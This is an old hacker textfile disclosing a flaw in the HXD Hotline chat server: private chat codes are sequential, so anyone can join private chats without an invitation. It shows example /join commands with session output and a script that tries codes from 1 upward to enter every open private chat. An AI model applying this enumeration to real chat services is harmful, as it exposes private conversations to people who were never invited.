home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / HXDPrivateChatSecurityFlaw.txt < prev    next >
Text File  |  1999-03-31  |  4KB  |  103 lines

  1. *** HXD Private Chat Security Flaw ***
  2.  
  3.     Well pretty much what this allows you to do in the hxd server is allow a user 
  4. to enter a private chat room in hx that he/she was not invited to.  If you use
  5. hx you know when someone invites you into a private chat you get some codes...
  6.  
  7. In Hotline Server 1.2.3 (http://www.hotlinesw.comwhen a user invites a user 
  8. into a private chat they get this infomation: 
  9.  
  10. <•> [nodozE(1)] invites you to chat 0xbdc9ab01
  11.  
  12. So if the person wants to enter they type:
  13.  
  14. /join 0xbdc9ab01
  15.  
  16.  But as you can see if you keep getting invited into a private chat you get all
  17.  these numbers.  As you can see there's no pattern.  There's no way of knowing what 
  18.  the next invite code will be because it's random.
  19.  
  20.  <•> [nodozE(1)] invites you to chat 0xe0af5102
  21.  <•> [nodozE(1)] invites you to chat 0x9ab45503
  22.  <•> [nodozE(1)] invites you to chat 0x3e41bc04
  23.  
  24.  But in HXD by rorschach (http://www.krazynet.com/hx) the Unix Hotline Server when it
  25.  gives the code for the private chat it comes out in a pattern such as shown 
  26.  below:
  27.  
  28.  <•> [nodozE(1)] invites you to chat 0x3
  29.  <•> [nodozE(1)] invites you to chat 0x4
  30.  <•> [nodozE(1)] invites you to chat 0x5
  31.  
  32.  Now you can see the pattern here.  The syntax is 0x#.  If you follow this you can
  33.  find out what other user chat rooms they're in by just typing 
  34.  
  35.  /join 0x#
  36.  
  37.  So if you know some people are in a private chat just invite yourself into a chat 
  38.  room (you are "Private Chat Hacker" :P): 
  39.  
  40.  /who
  41.  
  42.  socket | nick                            |  icon | level | stat |
  43.       1 | nodozE                          |   161 | ADMIN |      |
  44.       2 | Private Chat Hacker             |   161 | ADMIN |      |
  45.       3 | Admin                           |     0 |  USER |      |
  46.       
  47. /chat 2
  48.  
  49. [chat 0x666] join: nodozE [2:161:2]  
  50.  
  51. Now you know that the last private chat code that the server gave was 666 so try:
  52.  
  53. /join 665       
  54.  socket | nick                            |  icon | level | stat |
  55.       1 | nodozE                          |   161 | ADMIN |      |
  56.       3 | Admin                           |     0 | ADMIN |      |
  57.       2 | Private Chat Hacker             |   161 |  USER |      |
  58.       
  59. And what happend here?  nodozE and the admin are in a private chat... and guess
  60. who just showed up?  You sure did.  And they both think the other user in the
  61. private chat invited you.  
  62.  
  63. This isn't a huge security risk here.  But it is something that needs to be
  64. fixed.  I asked ror about it and he reply'd "Its not a flaw its a feature".
  65. I tried this out with the PC version of the server b8 and it did the same
  66. thing as the mac version, it gave random private chat codes.  Partly the reason
  67. for Hotline 1.2.3 is because of this reason i've been told because in 1.2.1 you
  68. could do the same thing.
  69.  
  70. If you wanted to you could make a hx script that looks something like this:
  71.  
  72. ---------------------------------------------------------------------------
  73. join 1
  74. join 2
  75. join 3
  76. join 4
  77. join 5
  78. join 6
  79. join 7
  80. join 8
  81. join 9
  82. join 10
  83. ---------------------------------------------------------------------------
  84.  
  85. ...etc all the way up to 1000 or so... then you would be in every private chat
  86. that would be open at that time.
  87.  
  88. # Thanks:
  89. phraq: for letting me run a hxd server off of his box.  
  90.  
  91. Foo: for letting me try out the pc version of the server.
  92.  
  93. HotlineSW Sucks (http://www.hotlineswsucks.com):  For being the "underground" of
  94. Hotline.
  95.  
  96. Bad Moon: All Bad Moon admins, the makers of the best hotline icons known 
  97. to mankind :)
  98. Bad Moon URL:  http://205.182.92.245/
  99. Bad Moon Hotline Server:  right now 208.24.56.203:666 but if the IP changes 
  100. just look on tracked.group.org
  101.  
  102. - nodozE
  103.